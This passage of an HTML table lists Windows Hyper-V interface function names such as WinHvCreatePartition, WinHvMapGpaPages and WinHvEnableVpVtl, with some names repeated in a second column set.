<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocateOverlayPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocatePartitionSintIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocatePortId </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocateSingleSintIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAssertVirtualInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAttachDevice </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCancelTimer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvClearVirtualInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvConfigureProfiler </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvConnectPort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreateEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreatePartition </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreatePort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreateTimer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreateVp </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeleteEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeletePartition </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeletePort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeleteTimer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeleteVp </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDepositMemory </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDetachDevice </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDisconnectPort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFinalizeEventLogBufferGroup </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFlushEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreeOverlayPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreePartitionSintIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreePortId </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreeSingleSintIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetCurrentVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorRunTime </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetMemoryBalance </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetNextChildPartition </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetNextQueuedPort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionId </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPortProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSintEventFlags </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSintMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSystemInformation </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetVpRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInitializeEventLogBufferGroup </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInjectSyntheticMachineCheckEvent </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInstallIntercept </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvLookupPortId </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvLowMemoryPolicyAutoDeposit </span></div>
</td><td style="border-color: rgb(0, 0, 0); border-style: solid; border-width: 1px 1px 1px 0px; padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvLowMemoryPolicyReturnStatus </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapDeviceInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapGpaPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapSparseGpaPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapStatsPage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvModifySparseGpaPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvNtProcessorToVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPostMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPrepareForSleep </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorIndexToLpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorNumberToVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvQueryInterceptIrql </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvQueryReferenceCounter </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvReadGpa </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvReleaseEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvRemoveLogicalProcessor </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvReportPresentHypervisor </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvRestorePartitionState </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSavePartitionState </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvScrubPartition </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetAbsoluteTimer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetEndOfMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetEventLogCompletedNotificationRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetEventLogGroupSources </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLogicalProcessorProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLogicalProcessorRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetPartitionProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetPortProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetSint </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetSintOnCurrentProcessor </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetStackwalkEvents </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetVpRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSignalEvent </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvTranslateVirtualAddress </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapDeviceInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapGpaPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapStatsPage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvWithdrawAllMemory </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvWithdrawMemory </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvWriteGpa </span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocateOverlayPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDisablePartitionVtl </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDisableVpVtl </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvEnablePartitionVtl </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvEnableVpVtl </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreeOverlayPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetCurrentVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSintEventFlags </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSintMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetVpRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvNtProcessorToVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
